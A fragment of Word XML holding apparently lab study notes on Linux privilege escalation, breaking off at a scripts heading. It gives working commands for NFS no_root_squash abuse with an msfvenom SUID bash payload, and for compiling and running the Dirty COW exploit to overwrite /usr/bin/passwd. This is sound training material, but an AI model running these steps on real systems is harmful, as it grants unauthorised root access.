        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>NFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEDA3D8" w14:textId="0660B2E2" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>files created via NFS inherit remote user’s ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BB495D" w14:textId="130F6987" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>root = root unless root squashing is enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51500A4D" w14:textId="72E8BB86" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>to check NFS share configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656EFCC3" w14:textId="1AB6C561" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/exports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BEE038" w14:textId="391699ED" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> share – enabled or disabled root squashing?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331BDBC9" w14:textId="7BCE4AB0" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>no_root_squash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34143B66" w14:textId="0B4151FF" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>as root user on attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F34D38" w14:textId="2632F2F4" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>create mount point on box and mount /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9F493E" w14:textId="0A0D4E53" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B8272BC" w14:textId="0026AA55" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">mount -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rw,vers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">=2 &lt;victim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66612A1C" w14:textId="2E555ED9" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">generate payload using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and save to mounted share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C247011" w14:textId="49540B33" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/x86/exec CMD="/bin/bash -p" -f elf -o /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="383E78A6" w14:textId="32354814" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>make file executable and set SUID permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411B072D" w14:textId="66451E00" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> +</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>xs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="049CE635" w14:textId="4FB494BD" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>on victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBAF0F2" w14:textId="7F60D25B" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>execute file to gain root shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4072F847" w14:textId="03714C6F" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C8DF639" w14:textId="51AB2593" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kernel Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCD61FA" w14:textId="5760A339" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>last resort – these exploits leave machines in unstable states</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3162940E" w14:textId="22337C9F" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>run Linux Exploit Suggester 2 tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C40926A" w14:textId="3180CD71" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35563082" w14:textId="04A02D07" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>popular Dirty COW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC0C36" w14:textId="78EE88B5" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>replaces SUID file /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/bin/passwd with one that spawns a shell (backup of /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/bin/passwd is made at /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF8DB9" w14:textId="13A6BFBC" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>compile code and run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F165CB2" w14:textId="17819206" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pthread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /home/user/tools/kernel-exploits/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dirtycow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/c0w.c -o c0w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB9C03" w14:textId="73FE442C" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>c0w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8A4357" w14:textId="4EA13962" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>run /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/bin/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A234975" w14:textId="5807F00A" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>gain access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439091B7" w14:textId="72FE73EF" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>to remove</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5891624D" w14:textId="77777777" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>mv /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/bin/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B29E19" w14:textId="0FFD5D72" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F685C1" w14:textId="75CC9DA8" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Privilege Escalation Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C93A34" w14:textId="638B08AF" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="002347BB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>on room machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D911AA" w14:textId="09F311A0" w:rsidR="002347BB" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="002347BB" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
